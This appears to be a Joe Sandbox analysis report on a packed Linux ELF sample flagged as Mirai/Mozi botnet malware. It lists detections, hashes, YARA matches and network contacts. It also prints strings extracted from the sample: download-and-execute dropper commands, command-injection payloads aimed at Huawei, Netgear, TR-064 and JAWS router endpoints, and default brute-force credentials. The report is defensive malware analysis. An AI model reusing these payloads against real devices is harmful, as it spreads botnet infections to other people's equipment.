Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:bin.sh.elf
Analysis ID:1643571
MD5:944f2c5896832670ed2341c7c12e2c36
SHA1:311a680784c8e1dea11267cd89c3ed6cb190c761
SHA256:31c8e4e926d4c0cc69d10be8e63fcb1950b68d4bd78c0a4c50c96cee6d8e9893
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample is packed with UPX
ELF contains segments with high entropy indicating compressed/encrypted content
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1643571
Start date and time:2025-03-20 00:26:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.sh.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/0@0/0
Command:/tmp/bin.sh.elf
PID:6264
Exit Code:133
Exit Code Info:
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
  • system is lnxubuntu20
  • bin.sh.elf (PID: 6264, Parent: 6187, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/bin.sh.elf
  • dash New Fork (PID: 6326, Parent: 4331)
  • rm (PID: 6326, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.71H0mcXTB8 /tmp/tmp.X7M0uFhHok /tmp/tmp.Ah1PQtjCYH
  • dash New Fork (PID: 6327, Parent: 4331)
  • rm (PID: 6327, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.71H0mcXTB8 /tmp/tmp.X7M0uFhHok /tmp/tmp.Ah1PQtjCYH
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.sh.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    bin.sh.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      bin.sh.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        bin.sh.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          bin.sh.elfLinux_Packer_Patched_UPX_62e11c64unknownunknown
          • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          6264.1.00007facac400000.00007facac421000.r-x.sdmpLinux_Packer_Patched_UPX_62e11c64unknownunknown
          • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: bin.sh.elfAvira: detected
          Source: bin.sh.elfVirustotal: Detection: 66%Perma Link
          Source: bin.sh.elfReversingLabs: Detection: 55%
          Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
          Source: bin.sh.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:39256 -> 34.249.145.219:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.a;chmod
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.a;sh$
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m;
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m;$
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/bin.sh
          Source: bin.sh.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
          Source: bin.sh.elfString found in binary or memory: http://127.0.0.1
          Source: bin.sh.elfString found in binary or memory: http://127.0.0.1sendcmd
          Source: bin.sh.elfString found in binary or memory: http://HTTP/1.1
          Source: bin.sh.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
          Source: bin.sh.elfString found in binary or memory: http://ipinfo.io/ip
          Source: bin.sh.elfString found in binary or memory: http://purenetworks.com/HNAP1/
          Source: bin.sh.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: bin.sh.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: bin.sh.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
          Source: bin.sh.elfString found in binary or memory: http://upx.sf.net
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39256 -> 443

          System Summary

          barindex
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
          Source: 6264.1.00007facac400000.00007facac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
          Source: LOAD without section mappingsProgram segment: 0x400000
          Source: Initial sampleString containing 'busybox' found: busybox
          Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
          Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
          Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
          Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
          Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
          Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
          Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
          Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
          Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
          Source: Initial sampleString containing potential weak password found: admin
          Source: Initial sampleString containing potential weak password found: default
          Source: Initial sampleString containing potential weak password found: support
          Source: Initial sampleString containing potential weak password found: service
          Source: Initial sampleString containing potential weak password found: supervisor
          Source: Initial sampleString containing potential weak password found: guest
          Source: Initial sampleString containing potential weak password found: administrator
          Source: Initial sampleString containing potential weak password found: 123456
          Source: Initial sampleString containing potential weak password found: 54321
          Source: Initial sampleString containing potential weak password found: password
          Source: Initial sampleString containing potential weak password found: 12345
          Source: Initial sampleString containing potential weak password found: admin1234
          Source: Initial samplePotential command found: GET /c HTTP/1.0
          Source: Initial samplePotential command found: GET %s HTTP/1.1
          Source: Initial samplePotential command found: GET /c
          Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
          Source: Initial samplePotential command found: GET /%s HTTP/1.1
          Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
          Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
          Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
          Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
          Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
          Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
          Source: 6264.1.00007facac400000.00007facac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
          Source: classification engineClassification label: mal100.troj.evad.linELF@0/0@0/0

          Data Obfuscation

          barindex
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
          Source: /usr/bin/dash (PID: 6326)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.71H0mcXTB8 /tmp/tmp.X7M0uFhHok /tmp/tmp.Ah1PQtjCYHJump to behavior
          Source: /usr/bin/dash (PID: 6327)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.71H0mcXTB8 /tmp/tmp.X7M0uFhHok /tmp/tmp.Ah1PQtjCYHJump to behavior
          Source: bin.sh.elfSubmission file: segment LOAD with 7.8142 entropy (max. 8.0)
          Source: /tmp/bin.sh.elf (PID: 6264)Queries kernel information via 'uname': Jump to behavior
          Source: bin.sh.elf, 6264.1.000055c806e1f000.000055c806ea6000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
          Source: bin.sh.elf, 6264.1.000055c806e1f000.000055c806ea6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
          Source: bin.sh.elf, 6264.1.00007ffe0cda0000.00007ffe0cdc1000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
          Source: bin.sh.elf, 6264.1.00007ffe0cda0000.00007ffe0cdc1000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
          Source: bin.sh.elf, 6264.1.00007ffe0cda0000.00007ffe0cdc1000.rw-.sdmpBinary or memory string: Kx86_64/usr/bin/qemu-mips/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: bin.sh.elf, type: SAMPLE

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid Accounts1
          Command and Scripting Interpreter
          1
          Scripting
          Path Interception11
          Obfuscated Files or Information
          1
          Brute Force
          11
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          File Deletion
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1643571 Sample: bin.sh.elf Startdate: 20/03/2025 Architecture: LINUX Score: 100 12 109.202.202.202, 80 INIT7CH Switzerland 2->12 14 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->14 16 34.249.145.219, 443 AMAZON-02US United States 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 Antivirus / Scanner detection for submitted sample 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 2 other signatures 2->24 6 dash rm 2->6         started        8 dash rm 2->8         started        10 bin.sh.elf 2->10         started        signatures3 process4
          SourceDetectionScannerLabelLink
          bin.sh.elf67%VirustotalBrowse
          bin.sh.elf56%ReversingLabsLinux.Trojan.Dakkatoni
          bin.sh.elf100%AviraEXP/ELF.Agent.L.24
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches

          Download Network PCAP: filteredfull

          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://%s:%d/bin.sh;chmodbin.sh.elffalse
            high
            http://ipinfo.io/ipbin.sh.elffalse
              high
              http://%s:%d/Mozi.a;chmodbin.sh.elffalse
                high
                http://%s:%d/Mozi.m;/tmp/Mozi.mbin.sh.elffalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/bin.sh.elffalse
                    high
                    http://%s:%d/bin.shbin.sh.elffalse
                      high
                      http://purenetworks.com/HNAP1/bin.sh.elffalse
                        high
                        http://%s:%d/Mozi.m;bin.sh.elffalse
                          high
                          http://%s:%d/Mozi.m;$bin.sh.elffalse
                            high
                            http://schemas.xmlsoap.org/soap/envelope/bin.sh.elffalse
                              high
                              http://upx.sf.netbin.sh.elffalse
                                high
                                http://HTTP/1.1bin.sh.elffalse
                                  high
                                  http://%s:%d/Mozi.a;sh$bin.sh.elffalse
                                    high
                                    http://127.0.0.1bin.sh.elffalse
                                      high
                                      http://baidu.com/%s/%s/%d/%s/%s/%s/%s)bin.sh.elffalse
                                        high
                                        http://schemas.xmlsoap.org/soap/envelope//bin.sh.elffalse
                                          high
                                          http://%s:%d/Mozi.mbin.sh.elffalse
                                            high
                                            http://127.0.0.1sendcmdbin.sh.elffalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              34.249.145.219
                                              unknownUnited States
                                              16509AMAZON-02USfalse
                                              109.202.202.202
                                              unknownSwitzerland
                                              13030INIT7CHfalse
                                              91.189.91.42
                                              unknownUnited Kingdom
                                              41231CANONICAL-ASGBfalse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              34.249.145.219sshd.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  miner.elfGet hashmaliciousUnknownBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        arm.elfGet hashmaliciousUnknownBrowse
                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                hoho.arm5.elfGet hashmaliciousUnknownBrowse
                                                                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                                  91.189.91.42jkse.arm6.elfGet hashmaliciousUnknownBrowse
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                        sshd.elfGet hashmaliciousUnknownBrowse
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                              splarm6.elfGet hashmaliciousUnknownBrowse
                                                                                zerppc.elfGet hashmaliciousUnknownBrowse
                                                                                  zerm68k.elfGet hashmaliciousUnknownBrowse
                                                                                    nabarm6.elfGet hashmaliciousUnknownBrowse
                                                                                      No context
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CANONICAL-ASGBjkse.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 91.189.91.42
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 91.189.91.42
                                                                                      .i.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.125.190.26
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 91.189.91.42
                                                                                      sshd.elfGet hashmaliciousUnknownBrowse
                                                                                      • 91.189.91.42
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 91.189.91.42
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 91.189.91.42
                                                                                      jkse.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.125.190.26
                                                                                      splarm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 91.189.91.42
                                                                                      nklarm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.125.190.26
                                                                                      INIT7CHjkse.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 109.202.202.202
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 109.202.202.202
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 109.202.202.202
                                                                                      sshd.elfGet hashmaliciousUnknownBrowse
                                                                                      • 109.202.202.202
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 109.202.202.202
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 109.202.202.202
                                                                                      splarm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 109.202.202.202
                                                                                      zerppc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 109.202.202.202
                                                                                      zerm68k.elfGet hashmaliciousUnknownBrowse
                                                                                      • 109.202.202.202
                                                                                      nabarm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 109.202.202.202
